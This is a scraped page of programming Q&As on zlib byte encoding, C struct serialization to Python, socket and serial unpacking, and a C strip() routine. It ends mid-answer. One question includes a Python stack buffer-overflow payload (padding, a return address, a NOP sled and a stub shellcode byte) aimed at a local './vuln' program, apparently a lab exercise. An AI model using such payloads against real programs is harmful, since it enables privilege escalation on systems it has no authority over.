Can zlib compressed output avoid using certain byte value? - python

It seems that the output of zlib.compress uses all possible byte values. Is it possible to restrict it to 255 of the 256 byte values (for example, to avoid \n)?
Note that I only use the Python manual as a reference; the question is not specific to Python (it applies to any language that has a zlib library).

No, this is not possible. Apart from the compressed data itself, there are standardized control structures that contain integers. Those integers may accidentally lead to any 8-bit value ending up in the bytestream.
Your only chance would be to encode the zlib bytestream into another format, e.g. base64.

The whole point of compression is to reduce the size as much as possible. If zlib or any compressor only used 255 of the 256 byte values, the size of the output would be increased by at least 0.07%.
That may be perfectly fine for you, so you can simply post-process the compressed output, or any data at all, to remove one particular byte value at the expense of some expansion. The simplest approach would be to replace that byte when it occurs with a two-byte escape sequence. You would also then need to replace the escape prefix with a different two-byte escape sequence. That would expand the data on average by 0.8%. That is exactly what Hans provided in another answer here.
If that cost is too high, you can do something more sophisticated, which is to decode a fixed Huffman code that encodes 255 symbols of equal probability. To decode you then encode that Huffman code. The input is a sequence of bits, not bytes, and most of the time you will need to pad the input with some zero bits to encode the last symbol. The Huffman code turns one symbol into seven bits and the other 254 symbols into eight bits. So going the other way, it will expand the input by a little less than 0.1%. For short messages it will be a little more, since often less than seven bits at the very end will be encoded into a symbol.
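The three overhead figures quoted above (0.07%, 0.8%, and a little under 0.1%) can be checked with a few lines of arithmetic. This is only a sanity check, assuming the compressed input behaves like uniformly random bits; the variable names are my own.

```python
import math

# Lower bound: each output byte can take only 255 values, so it carries
# log2(255) bits instead of 8.
entropy_bound = 8 / math.log2(255) - 1

# Escape scheme: 2 of the 256 byte values (the forbidden byte and the
# escape prefix) each grow from one byte to two.
escape_cost = 2 / 256

# Fixed Huffman code: an output byte carries 7 input bits with probability
# 1/128 and 8 bits otherwise, i.e. 8 - 1/128 input bits on average.
huffman_cost = 8 / (8 - 1 / 128) - 1

print(f"entropy bound : {entropy_bound:.4%}")
print(f"escape scheme : {escape_cost:.4%}")
print(f"Huffman scheme: {huffman_cost:.4%}")
```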
Implementation in C:
// Placed in the public domain by Mark Adler, 26 June 2020.
// Encode an arbitrary stream of bytes into a stream of symbols limited to 255
// values. In particular, avoid the \n (10) byte value. With -d, decode back to
// the original byte stream. Take input from stdin, and write output to stdout.
#include <stdio.h>
#include <string.h>
// Encode arbitrary bytes to a sequence of 255 symbols, which are written out
// as bytes that exclude the value '\n' (10). This encoding is actually a
// decoding of a fixed Huffman code of 255 symbols of equal probability. The
// output will be on average a little less than 0.1% larger than the input,
// plus one byte, assuming random input. This is intended to be used on
// compressed data, which will appear random. An input of all zero bits will
// have the maximum possible expansion, which is 14.3%, plus one byte.
int nolf_encode(FILE *in, FILE *out) {
unsigned buf = 0;
int bits = 0, ch;
do {
if (bits < 8) {
ch = getc(in);
if (ch != EOF) {
buf |= (unsigned)ch << bits;
bits += 8;
}
else if (bits == 0)
break;
}
if ((buf & 0x7f) == 0) {
buf >>= 7;
bits -= 7;
putc(0, out);
continue;
}
int sym = buf & 0xff;
buf >>= 8;
bits -= 8;
if (sym >= '\n' && sym < 128)
sym++;
putc(sym, out);
} while (ch != EOF);
return 0;
}
// Decode a sequence of symbols from a set of 255 that was encoded by
// nolf_encode(). The input is read as bytes that exclude the value '\n' (10).
// Any such values in the input are ignored and flagged in an error message.
// The sequence is decoded to the original sequence of arbitrary bytes. The
// decoding is actually an encoding of a fixed Huffman code of 255 symbols of
// equal probability.
int nolf_decode(FILE *in, FILE *out) {
unsigned long lfs = 0;
unsigned buf = 0;
int bits = 0, ch;
while ((ch = getc(in)) != EOF) {
if (ch == '\n') {
lfs++;
continue;
}
if (ch == 0) {
if (bits == 0) {
bits = 7;
continue;
}
bits--;
}
else {
if (ch > '\n' && ch <= 128)
ch--;
buf |= (unsigned)ch << bits;
}
putc(buf, out);
buf >>= 8;
}
if (lfs)
fprintf(stderr, "nolf: %lu unexpected line feeds ignored\n", lfs);
return lfs != 0;
}
// Encode (no arguments) or decode (-d) from stdin to stdout.
int main(int argc, char **argv) {
if (argc == 1)
return nolf_encode(stdin, stdout);
else if (argc == 2 && strcmp(argv[1], "-d") == 0)
return nolf_decode(stdin, stdout);
fputs("nolf: unknown options (use -d to decode)\n", stderr);
return 1;
}
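For readers following along in Python, here is a rough port of the two C routines above. It is a sketch rather than a vetted implementation: the function names mirror the C ones, but working on whole bytes objects instead of streams is my own simplification, and stray line feeds are silently skipped instead of being counted.

```python
import zlib

def nolf_encode(data: bytes) -> bytes:
    """Re-code arbitrary bytes into bytes that never contain 10 (newline)."""
    out = bytearray()
    buf = bits = 0
    source = iter(data)
    eof = False
    while True:
        if bits < 8:
            ch = next(source, None)
            if ch is not None:
                buf |= ch << bits
                bits += 8
            else:
                eof = True
                if bits == 0:
                    break
        if buf & 0x7F == 0:
            # Seven zero bits map to the single 7-bit symbol, written as 0.
            buf >>= 7
            bits -= 7
            out.append(0)
        else:
            sym = buf & 0xFF
            buf >>= 8
            bits -= 8
            if 10 <= sym < 128:
                sym += 1  # shift 10..127 up to 11..128, skipping newline
            out.append(sym)
        if eof:
            break
    return bytes(out)

def nolf_decode(data: bytes) -> bytes:
    """Invert nolf_encode(); any newline bytes in the input are ignored."""
    out = bytearray()
    buf = bits = 0
    for ch in data:
        if ch == 10:
            continue
        if ch == 0:
            if bits == 0:
                bits = 7  # seven pending zero bits, not yet a full byte
                continue
            bits -= 1
        else:
            if 10 < ch <= 128:
                ch -= 1
            buf |= ch << bits
        out.append(buf & 0xFF)
        buf >>= 8
    return bytes(out)

compressed = zlib.compress(b"line one\nline two\n" * 200)
encoded = nolf_encode(compressed)
print(len(compressed), len(encoded), 10 in encoded)
```

The final padding bits added by the encoder never complete a byte on the decoding side, which is why no explicit length field is needed.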

As @ypnos says, this isn't possible within zlib itself. You mentioned that base64 encoding is too inefficient, but it's pretty easy to use an escape character to encode a character you want to avoid (like newlines).
This isn't the most efficient code in the world (and you might want to do something like finding the least used bytes to save a tiny bit more space), but it's readable enough and demonstrates the idea. You can losslessly encode/decode, and the encoded stream won't have any newlines.
def encode(data):
    # order matters
    return data.replace(b'a', b'aa').replace(b'\n', b'ab')
def decode(data):
    def _foo():
        pair = False
        for b in data:
            if pair:
                # yield b'a' if b==b'a' else b'\n'
                yield 97 if b==97 else 10
                pair = False
            elif b==97: # b'a'
                pair = True
            else:
                yield b
    return bytes(_foo())
As some measure of confidence you can check this exhaustively on small bytestrings:
from itertools import *
all(
    bytes(p) == decode(encode(bytes(p)))
    for c in combinations_with_replacement(b'ab\nc', r=6)
    for p in permutations(c)
)
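The "least used byte" idea mentioned above could look roughly like the following. This is my own sketch, not part of the answer: the names encode_rarest and decode_rarest, the one-byte header that records the chosen escape byte, and the marker byte are all assumptions made for illustration.

```python
import zlib
from collections import Counter

NEWLINE = 10  # the byte value that must not appear in the output

def encode_rarest(data: bytes) -> bytes:
    counts = Counter(data)
    # Use the rarest byte (never the newline itself) as the escape prefix.
    esc = min((b for b in range(256) if b != NEWLINE), key=lambda b: counts[b])
    marker = 0 if esc != 0 else 1  # any byte that is neither esc nor newline
    out = bytearray([esc])         # header: tells the decoder which byte escapes
    for b in data:
        if b == esc:
            out += bytes((esc, esc))     # a literal escape byte
        elif b == NEWLINE:
            out += bytes((esc, marker))  # an escaped newline
        else:
            out.append(b)
    return bytes(out)

def decode_rarest(data: bytes) -> bytes:
    esc = data[0]
    out = bytearray()
    body = iter(data[1:])
    for b in body:
        if b == esc:
            # The byte after the prefix says which of the two cases this is.
            out.append(esc if next(body) == esc else NEWLINE)
        else:
            out.append(b)
    return bytes(out)

payload = zlib.compress(b"some text\n" * 500)
wrapped = encode_rarest(payload)
print(len(payload), len(wrapped))
```

On short inputs the rarest byte often does not occur at all, so only the newlines themselves cost an extra byte, plus the one-byte header.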

Related

C++ byte array (struct) interpreted by Python

I am trying to pass a C++ struct from my arduino to my raspberry pi. I have a struct that looks like this:
struct node_status
{
char *node_type = "incubator";
char *sub_type; // set the type of incubator
int sub_type_id;
bool sleep = false; // set to sleep
int check_in_time = 1000; // set check in time
bool LOCK = false; // set if admin control is true/false
} nodeStatus;
I tried using the python module named struct
from struct import *
print("Rcvd Node Status msg from 0{:o}".format(header.from_node))
print("node_type: {}".format(unpack("10s",payload[0]))) #node_type
node_type = unpack("10s",payload[0])
print("sub_type: {}".format(unpack("10s",payload[1]), header.from_node)) #sub_type
sub_type = unpack("10s",payload[1])
print("sub_type_id: {}".format(unpack("b",payload[2])))
sub_type_id = unpack("b",payload[2])
print("sleep: {}".format(unpack("?",payload)[3])) #sleep
sleep = unpack("?",payload[3])
print("check_in_time: {}".format(unpack("l",payload[4]))) #check_in_time
check_in_time = unpack("l",payload[4])
print("Lock: {}".format(unpack("?",payload[5]))) #LOCK
Lock = unpack("?",payload[5])
but I am not having much luck. I also looked at the ctypes module, but I am not getting anywhere with that either:
from ctypes import *
class interpret_nodes_status(Structure):
    _fields_ = [('node_type',c_char_p),
                ('sub_type',c_char_p),
                ('sub_type_id',c_int),
                ('sleep',c_bool),
                ('check_in_time',c_int),
                ('LOCK',c_bool)]
nodestatus = interpret_nodes_status(payload)
but that just gives me an error
TypeError: bytes or integer address expected instead of bytearray instance
What can I do? WHERE am I going wrong with this?
EDIT:
I am using the RF24Mesh Library from
https://github.com/nRF24/RF24Mesh
This is how I send the message:
RF24NetworkHeader header();
if (!mesh.write(&nodeStatus, /*type*/ 126, sizeof(nodeStatus), /*to node*/ 000))
{ // Send the data
if ( !mesh.checkConnection() )
{
Serial.println("Renewing Address");
mesh.renewAddress();
}
}
else
{
Serial.println("node status msg Sent");
return;
}
}
Your C program is just sending the struct, but the struct doesn't contain any of the string data. It only includes pointers (addresses) which are not usable by any other process (different address spaces).
You would need to determine a way to send all the required data, which would likely mean sending the length of each string and its data.
One way to do that would be to use a maximum length and just store the strings in your struct:
struct node_status
{
char node_type[48];
char sub_type[48]; // set the type of incubator
int sub_type_id;
bool sleep = false; // set to sleep
int check_in_time = 1000; // set check in time
bool LOCK = false; // set if admin control is true/false
} nodeStatus;
You would then need to copy strings into those buffers instead of assigning them, and check for buffer overflow. If the strings are ever entered by users, this has security implications.
Another approach is to pack the data into a single block just when you send it.
You could use multiple writes, as well, but I don't know this mesh library or how you would set the type parameter to do that. Using a buffer is something like:
// be sure to check for null on your strings, too.
int lennodetype = strlen(nodeStatus.node_type);
int lensubtype = strlen(nodeStatus.sub_type);
// two int length prefixes + both strings + the struct itself
int bufsize = 2 * sizeof(int) + lennodetype + lensubtype + sizeof(nodeStatus);
byte* buffer = new byte[bufsize];
int offset = 0;
memcpy(buffer+offset, &lennodetype, sizeof(int));
offset += sizeof(int);
memcpy(buffer+offset, nodeStatus.node_type, lennodetype * sizeof(char));
offset += lennodetype * sizeof(char);
memcpy(buffer+offset, &lensubtype, sizeof(int));
offset += sizeof(int);
memcpy(buffer+offset, nodeStatus.sub_type, lensubtype * sizeof(char));
offset += lensubtype * sizeof(char);
// this still copies the pointers, which aren't needed, but simplifies the code
// and 8 unused bytes shouldn't matter too much. You could adjust this line to
// eliminate it if you wanted.
memcpy(buffer+offset, &nodeStatus, sizeof(nodeStatus));
if (!mesh.write(buffer,
/*type*/ 126,
bufsize,
/*to node*/ 000))
{ // Send the data
if ( !mesh.checkConnection() )
{
Serial.println("Renewing Address");
mesh.renewAddress();
}
}
else
{
Serial.println("node status msg Sent");
}
delete [] buffer;
Now that the data is actually SENT (a prerequisite for reading the data) the data you need should all be in the payload array. You will need to unpack it, but you can't just pass unpack a single byte, it needs the array:
# assumes the sender's int is 4 bytes, little-endian (use "<h" for 2-byte ints)
(length,) = struct.unpack_from("<i", payload, 0)
offset = 4
(node_type,) = struct.unpack_from("{}s".format(length), payload, offset)
offset += length
(length,) = struct.unpack_from("<i", payload, offset)
offset += 4
(sub_type,) = struct.unpack_from("{}s".format(length), payload, offset)
offset += length
...
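To try the parsing logic without the radio hardware, the sender's buffer can be simulated in Python. The sketch below assumes 4-byte little-endian length prefixes as in the C++ code above; parse_strings and length_prefixed are hypothetical helper names, and the trailing bytes merely stand in for the copied struct.

```python
import struct

def parse_strings(payload: bytes):
    """Read two length-prefixed strings from the front of the payload."""
    offset = 0
    strings = []
    for _ in range(2):
        (length,) = struct.unpack_from("<i", payload, offset)
        offset += struct.calcsize("<i")
        (raw,) = struct.unpack_from(f"{length}s", payload, offset)
        offset += length
        strings.append(raw.decode("ascii"))
    return strings, offset  # offset now points at the copied struct

def length_prefixed(text: bytes) -> bytes:
    """Mimic the sender: a 4-byte length followed by the string bytes."""
    return struct.pack("<i", len(text)) + text

payload = length_prefixed(b"incubator") + length_prefixed(b"chicken") + b"\x00" * 8
(node_type, sub_type), rest_offset = parse_strings(payload)
print(node_type, sub_type, rest_offset)
```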
I upvoted Garr Godfrey's answer as it is a good one indeed. However, it will increase the struct's size. This is neither a good nor a bad thing, but if for some reason you would like to keep the solution based on char* pointers instead of arrays (e.g. you don't know the maximum length of the strings), it can be achieved the following way (my code assumes that int is 4 bytes and little-endian, bool is 1 byte, and char is 1 byte):
//_Static_assert(sizeof(int)==4u, "Int size has to be 4 bytes");
//the above one is C11, the one below is C++:
//feel free to ifdef that if you need it
static_assert(sizeof(int)==4u, "Int size has to be 4 bytes");
struct node_status
{
char* node_type;
char* sub_type; // set the type of incubator
int sub_type_id;
bool sleep; // set to sleep
int check_in_time; // set check in time
bool LOCK; // set if admin control is true/false
};
size_t serialize_node_status(const struct node_status* st, char* buffer)
{
//this bases on the assumption buffer is large enough
//and string pointers are not null
size_t offset=0u;
size_t l = 0;
l = strlen(st->node_type)+1;
memcpy(buffer+offset, st->node_type, l);
offset += l;
l = strlen(st->sub_type)+1;
memcpy(buffer+offset, st->sub_type, l);
offset += l;
l = sizeof(st->sub_type_id);
memcpy(buffer+offset, &st->sub_type_id, l);
offset += l;
l = sizeof(st->sleep);
memcpy(buffer+offset, &st->sleep, l);
offset += l;
l = sizeof(st->check_in_time);
memcpy(buffer+offset, &st->check_in_time, l);
offset += l;
l = sizeof(st->LOCK);
memcpy(buffer+offset, &st->LOCK, l);
offset += l;
return offset;
}
// sending:
char buf[100] = {0}; //pick the needed size or allocate it dynamically
struct node_status nodeStatus = {"abcz", "x", 20, true, 999, false};
size_t serialized_bytes = serialize_node_status(&nodeStatus, buf);
mesh.write(buf, /*type*/ 126, serialized_bytes, /*to node*/ 000);
Side note: assigning string literals directly to char pointers is not valid C++.
So the string types either should be const char*, e.g. const char* node_type or the file should be compiled as C (where you can get away with it). Arduino often tends to have its own compilation options set, so it is likely to work due to compiler extension (or just inhibited warning). Thus, not being sure what exactly is going to be used, I wrote a C11-compatible version.
And then on Python's end:
INT_SIZE=4
class node_status:
    def __init__(self,
                 nt: str,
                 st: str,
                 stid: int,
                 sl: bool,
                 cit: int,
                 lck: bool):
        self.node_type = nt
        self.sub_type = st
        self.sub_type_id = stid
        self.sleep = sl
        self.check_in_time = cit
        self.LOCK = lck
    def __str__(self):
        s=f'node_type={self.node_type} sub_type={self.sub_type}'
        s+=f' sub_type_id={self.sub_type_id} sleep={self.sleep}'
        s+=f' check_in_time={self.check_in_time} LOCK={self.LOCK}'
        return s
    @classmethod
    def from_bytes(cls, b: bytes):
        end = b.index(0x00)  # position of the NUL terminator
        nt = str(b[:end], 'utf-8')  # decode without the terminator
        b = b[end+1:]
        end = b.index(0x00)
        st = str(b[:end], 'utf-8')
        b = b[end+1:]
        stid = int.from_bytes(b[:INT_SIZE], 'little')
        b = b[INT_SIZE:]
        sl = bool(b[0])
        b = b[1:]
        cit = int.from_bytes(b[:INT_SIZE], 'little')
        b = b[INT_SIZE:]
        lck = bool(b[0])
        b = b[1:]
        assert(len(b) == 0)
        return cls(nt, st, stid, sl, cit, lck)
#and the deserialization goes like this:
fromMesh1 = bytes([0x61,0x62,0x63,0x0,0x78,0x79,0x7A,0x0,0x14,0x0,0x0,0x0,0x1,0xE7,0x3,0x0,0x0,0x1])
fromMesh2 = bytes([0x61,0x62,0x63,0x0,0x78,0x79,0x7A,0x0,0x14,0x0,0x0,0x0,0x1,0xE7,0x3,0x0,0x0,0x0])
fromMesh3 = bytes([0x61,0x62,0x63,0x7A,0x0,0x78,0x0,0x14,0x0,0x0,0x0,0x1,0xE7,0x3,0x0,0x0,0x0])
print(node_status.from_bytes(fromMesh1))
print(node_status.from_bytes(fromMesh2))
print(node_status.from_bytes(fromMesh3))
These are all good answers, but not what was required. I suppose a more in-depth knowledge of the RF24Mesh library was needed. I was able to find the answer with the help of some RF24 pros. Here is my solution:
I had to change the struct to specific sizes using char name[10] on the C++ arduino side.
struct node_status
{
char node_type[10] = "incubator";
char sub_type[10] = "chicken"; // set the type of incubator
int sub_type_id = 1;
bool sleep = false; // set to sleep
int check_in_time = 1000; // set check in time
bool LOCK = false; // set if admin control is true/false
} nodeStatus;
Unfortunately, it looks like read() returns the payload with a length of what you passed to the read() function. This is unintuitive and should be improved. Not to mention, the parameter specifying the length of the payload to return should be optional.
Until they get a fix for this, I will have to slice the payload to only the length that struct.unpack() needs (which can be determined from the format string). So, basically:
# get the max sized payload despite what was actually received
head, payload = network.read(144)
# unpack 30 bytes
(
node_type,
sub_type,
sub_type_id,
sleep,
check_in_time,
LOCK,
) = struct.unpack("<10s10si?i?", payload[:30])
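The slice length does not have to be hard-coded: struct.calcsize() derives it from the format string. The sketch below simulates a 144-byte payload with struct.pack (the field values are taken from the struct above; the zero filler is an assumption) and also trims the NUL bytes that fixed-size char arrays leave behind.

```python
import struct

FMT = "<10s10si?i?"
size = struct.calcsize(FMT)  # number of bytes the format actually covers

# Simulated read(): the meaningful bytes followed by filler up to 144 bytes.
packed = struct.pack(FMT, b"incubator", b"chicken", 1, False, 1000, False)
payload = packed + b"\x00" * (144 - len(packed))

fields = struct.unpack(FMT, payload[:size])

# "10s" returns all 10 bytes, so cut each string at its first NUL.
node_type = fields[0].split(b"\x00", 1)[0].decode("ascii")
sub_type = fields[1].split(b"\x00", 1)[0].decode("ascii")
print(size, node_type, sub_type, fields[2:])
```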
I finally got it to work using this method. I want to be fair about giving the points and would like to have your opinion on who should get them that was closest to this method. Please comment below.

Converting Python program to C: How can I multiply a character by a specified value and store it into a variable?

in need of general help with converting a small buffer overflow script in Python to C. It's a bit of hack job and I am struggling to get the data types right. I can compile everything with only a single warning: "initialization makes pointer from integer without a cast - char *buff = ("%0*i", 252, 'A');"
This line is supposed to give the variable buff the value of 252 'A' characters.
I know that changing the data type can fix this, but the rest of the program relies on overflow being a pointer char *.
If anyone has any tips for me regarding any parts of the program they would be greatly appreciated.
cheers, Shiv
ORIGINAL Python:
stack_addr = 0xbffff1d0
rootcode = "\x31"
def conv(num):
    return struct.pack("<I",num)
buff = "A" * 172
buff += conv(stack_addr)
buff += "\x90" * 30
buff += rootcode
buff += "A" * 22
print "targetting vulnerable program"
call(["./vuln", buff])
Converted C code:
//endianess convertion
int conv(int stack_addr)
{
(stack_addr>>8) | (stack_addr<<8);
return(0);
}
int main(int argc, char *argv[])
{
int stack_addr = 0xbffff1d0;
int rootcode = *"\x31"
char *buff = ("%0*i", 252, 'A'); //give buff the value of 252 'A's
buff += conv(stack_addr); //endian conversion
buff += ("%0*i", 30, '\x90'); //append buff variable with 30 '\x90'
buff = buff + rootcode; //append buff with value of rootcode variable
buff += ("%0*i", 22, 'A'); //append buff with 22 'A's
}
The easiest way is to write a string with the needed number of characters manually. Use the copy-paste feature of your favourite text editor.
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
You can also build it from individual characters, using a for-loop, as described below. However, you can skip the part with building a long string, and append individual characters directly to the final string. This can be done in two ways: using strcat and without using strcat. The first way is a little cleaner:
char buff[400] = ""; // note: this should be an array, not a pointer!
// the array should be big enough to hold the final string; 400 seems enough
for (int i = 0; i < 252; i++)
strcat(buff, "A"); // this part appends one string of length 1
The function strcat is inefficient; it calculates the length of the string each time you append the string "A" to it. You don't need speed, but if you ever decide to write it efficiently, don't use strcat, and append individual char (bytes) to the array using core C language:
char buff[400]; // note: this should be an array, not a pointer!
int pos = 0; // position at which to write data
for (int i = 0; i < 252; i++)
buff[pos++] = 'A'; // this part appends one char 'A'; note single quotes
...
buff[pos++] = '\0'; // don't forget to terminate the string!

How to unpack a C-style structure inside another structure?

I am receiving data via socket interface from an application (server) written in C. The data being posted has the following structure. I am receiving data with a client written in Python.
struct hdr
{
int Id;
char PktType;
int SeqNo;
int Pktlength;
};
struct trl
{
char Message[16];
long long info;
};
struct data
{
char value[10];
double result;
long long count;
short int valueid;
};
typedef struct
{
struct hdr hdr_buf;
struct data data_buf[100];
struct trl trl_buf;
} trx_unit;
How do I unpack the received data to access my inner data buffer?
Using the struct library is the way to go. However, you will have to know a bit more about the C program that is serializing the data. Consider the hdr structure. If the C program is sending it using the naive approach:
struct hdr header;
send(sd, &header, sizeof(header), 0);
Then your client cannot safely interpret the bytes that are sent to it because there is an indeterminate amount of padding inserted between the struct members. In particular, I would expect three bytes of padding following the PktType member.
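The padding can be made visible from Python by mirroring the struct with ctypes, which follows the platform's native layout rules. This is an illustrative sketch: the Hdr class is my own mirror of struct hdr, and the numbers in the comments hold on typical platforms where int is 4 bytes and 4-byte aligned.

```python
import ctypes
import struct

class Hdr(ctypes.Structure):
    # Same members, in the same order, as struct hdr in the question.
    _fields_ = [("Id", ctypes.c_int),
                ("PktType", ctypes.c_char),
                ("SeqNo", ctypes.c_int),
                ("Pktlength", ctypes.c_int)]

packed_size = struct.calcsize("<ibii")  # members laid end to end: 13 bytes
native_size = ctypes.sizeof(Hdr)        # typically 16 bytes
padding_after_pkt_type = Hdr.SeqNo.offset - (Hdr.PktType.offset + 1)

print(packed_size, native_size, padding_after_pkt_type)
```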
The safest way to approach sending around binary data is to have the server and client serialize the bytes directly to ensure that there is no additional padding and to make the byte ordering of multibyte integers explicit. For example:
/*
* Send a header over a socket.
*
* The header is sent as a stream of packed bytes with
* integers in "network" byte order. For example, a
* header value of:
* Id: 0x11223344
* PktType: 0xff
* SeqNo: 0x55667788
* PktLength: 0x99aabbcc
*
* is sent as the following byte stream:
* 11 22 33 44 ff 55 66 77 88 99 aa bb cc
*/
void
send_header(int sd, struct hdr const* header)
{ /* NO ERROR HANDLING */
uint32_t num = htonl((uint32_t)header->Id);
send(sd, &num, sizeof(num), 0);
send(sd, &header->PktType, sizeof(header->PktType), 0);
num = htonl((uint32_t)header->SeqNo);
send(sd, &num, sizeof(num), 0);
num = htonl((uint32_t)header->Pktlength);
send(sd, &num, sizeof(num), 0);
}
This will ensure that your client can safely decode it using the struct module:
buf = s.recv(13) # packed data is 13 bytes long
id_, pkt_type, seq_no, pkt_length = struct.unpack('>IBII', buf)
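One caveat with the snippet above: recv(13) may return fewer than 13 bytes on a stream socket, in which case struct.unpack raises an error. A small helper that loops until the requested count has arrived is a common remedy; recv_exact is a hypothetical name, and the socketpair only stands in for the real server connection.

```python
import socket
import struct

def recv_exact(sock, n):
    """Keep calling recv() until exactly n bytes have been collected."""
    data = bytearray()
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError("socket closed before %d bytes arrived" % n)
        data += chunk
    return bytes(data)

# Stand-in for the C server: a connected pair of local sockets.
server, client = socket.socketpair()
server.sendall(struct.pack(">IBII", 0x11223344, 0xFF, 0x55667788, 0x99AABBCC))
header = struct.unpack(">IBII", recv_exact(client, 13))
server.close()
client.close()
print([hex(v) for v in header])
```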
If you cannot modify the C code to fix the serialization indeterminacy, then you will have to read the data from the stream and figure out where the C compiler is inserting padding and manually build struct format strings to match using the padding byte format character to ignore padding values.
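As a sketch of that fallback, the x format character skips one byte per occurrence. The layout assumed here (little-endian sender, 4-byte int, three pad bytes after PktType) is only a typical case and has to be confirmed against the real server; the sample bytes are made up.

```python
import struct

# i  Id        4 bytes
# c  PktType   1 byte
# 3x           3 pad bytes inserted by the compiler (assumed)
# i  SeqNo     4 bytes
# i  Pktlength 4 bytes
PADDED_HDR = "<ic3xii"

# Made-up raw header as the unmodified server might send it; the pad bytes
# contain garbage, which the x characters skip.
raw = struct.pack("<i", 1) + b"D" + b"\xaa\xbb\xcc" + struct.pack("<ii", 7, 2824)

id_, pkt_type, seq_no, pkt_length = struct.unpack(PADDED_HDR, raw)
print(id_, pkt_type, seq_no, pkt_length)
```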
I usually write a decoder class in Python that reads a complete value from the socket. In your case it would look something like:
class PacketReader(object):
    def __init__(self, sd):
        # sd must be a file-like object with a blocking read(n), e.g. the
        # result of sock.makefile('rb'); plain sockets have no read()
        self._socket = sd
    def read_packet(self):
        id_, pkt_type, seq_no, pkt_length = self._read_header()
        data_bufs = [self._read_data_buf() for _ in range(0, 100)]
        message, info = self._read_trl()
        return {'id': id_, 'pkt_type': pkt_type, 'seq_no': seq_no,
                'data_bufs': data_bufs, 'message': message,
                'info': info}
    def _read_header(self):
        """
        Read and unpack a ``hdr`` structure.
        :returns: a :class:`tuple` of the header data values
            in order - *Id*, *PktType*, *SeqNo*, and *PktLength*
        The header is assumed to be packed as 13 bytes with
        integers in network byte order.
        """
        buf = self._socket.read(13)
        # > Multibyte values in network order
        # I Id as 32-bit unsigned integer value
        # B PktType as 8-bit unsigned integer value
        # I SeqNo as 32-bit unsigned integer value
        # I PktLength as 32-bit unsigned integer value
        return struct.unpack('>IBII', buf)
    def _read_data_buf(self):
        """
        Read and unpack a single ``data`` structure.
        :returns: a :class:`tuple` of data values in order -
            *value*, *result*, *count*, and *valueid*
        The data structure is assumed to be packed as 28 bytes
        with integers in network byte order and doubles encoded
        as IEEE 754 binary64 in network byte order.
        """
        buf = self._socket.read(28) # assumes double is binary64
        # > Multibyte values in network order
        # 10s value bytes
        # d result encoded as IEEE 754 binary64 value
        # q count encoded as a 64-bit signed integer
        # H valueid as a 16-bit unsigned integer value
        return struct.unpack('>10sdqH', buf)
    def _read_trl(self):
        """
        Read and unpack a ``trl`` structure.
        :returns: a :class:`tuple` of trl values in order -
            *Message* as byte string, *info*
        The structure is assumed to be packed as 24 bytes with
        integers in network byte order.
        """
        buf = self._socket.read(24)
        # > Multibyte values in network order
        # 16s message bytes
        # q info encoded as a 64-bit signed value
        return struct.unpack('>16sq', buf)
Mind you that this is untested and probably contains syntax errors but that is how I would approach the problem.
The struct library has all you need to do this.

collecting 'double' type data from arduino

I'm trying to send floating-point data from an Arduino to Python. The data is sent as 8 successive bytes (the size of a double) followed by a newline character ('\n'). How can I collect these successive bytes and convert them to the proper format on the Python (host) side?
void USART_transmitdouble(double* d)
{
union Sharedblock
{
char part[sizeof(double)];
double data;
}my_block;
my_block.data = *d;
for(int i=0;i<sizeof(double);++i)
{
USART_send(my_block.part[i]);
}
USART_send('\n');
}
int main()
{
USART_init();
double dble=5.5;
while(1)
{
USART_transmitdouble(&dble);
}
return 0;
}
Python code. I know this won't print the data in the proper format; I just want to show what I have tried.
import serial,time
my_port = serial.Serial('/dev/tty.usbmodemfa131',19200)
while 1:
    print my_port.readline(),
    time.sleep(0.15)
Update:
my_ser = serial.Serial('/dev/tty.usbmodemfa131',19200)
while 1:
    #a = raw_input('enter a value:')
    #my_ser.write(a)
    data = my_ser.read(5)
    f_data, = struct.unpack('<fx',data)
    print f_data
    #time.sleep(0.5)
Using the struct module as shown in the code above, I am able to print float values. But the data is printed correctly only about 50% of the time.
If I change time.sleep() or stop the transmission and restart it, incorrect values are printed. I guess the wrong set of 4 bytes is being unpacked in this case. Any idea what we can do here?
On AVR-based Arduino boards (such as the Uno), a double is the same as float, i.e. a little-endian single-precision floating-point number that occupies 4 bytes of memory. This means that you should read exactly 5 bytes, use the little-endian variant of the f format to unpack it, and ignore the trailing newline with x:
import struct
...
data = my_port.read(5)
num, = struct.unpack('<fx', data)
Note that you don't want to use readline because any byte of the representation of the floating-point number can be '\n'.
As Nikklas B. pointed out, you don't even need to bother with the newline at all, just send the 4 bytes and read as many from Python. In that case the format string will be '<f'.
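Both points can be tried without the board by building the frames with struct.pack. The sketch below assumes the 4-byte little-endian float described above; the value 8.625 is chosen only because one of its bytes happens to be 0x0A, the newline.

```python
import struct

# What the board sends for 5.5: four float bytes plus the newline.
frame = struct.pack("<f", 5.5) + b"\n"
(value,) = struct.unpack("<fx", frame)
print(value)

# 8.625 is encoded as 00 00 0A 41, so a newline appears inside the number
# and readline() would return after only three bytes.
tricky = struct.pack("<f", 8.625) + b"\n"
first_newline = tricky.index(b"\n")
print(tricky.hex(), first_newline)
```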

Mimic Python's strip() function in C

I started on a little toy project in C lately and have been scratching my head over the best way to mimic the strip() functionality that is part of the python string objects.
From what I have read, fscanf and sscanf only process the string up to the first whitespace that is encountered.
fgets doesn't help either as I still have newlines sticking around.
I did try a strchr() to search for a whitespace and setting the returned pointer to '\0' explicitly but that doesn't seem to work.
Python strings' strip method removes both trailing and leading whitespace. The two halves of the problem are very different when working on a C "string" (array of char, \0 terminated).
For trailing whitespace: set a pointer (or equivalently index) to the existing trailing \0. Keep decrementing the pointer until it hits against the start-of-string, or any non-white character; set the \0 to right after this terminate-backwards-scan point.
For leading whitespace: set a pointer (or equivalently index) to the start of string; keep incrementing the pointer until it hits a non-white character (possibly the trailing \0); memmove the rest-of-string so that the first non-white goes to the start of string (and similarly for everything following).
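The two scans described above can be prototyped in Python on a bytes object before writing the C version. This is a sketch with a made-up function name; the whitespace set is the one C's isspace() accepts in the default "C" locale, which is also what bytes.strip() removes.

```python
WHITESPACE = b" \t\n\r\x0b\x0c"

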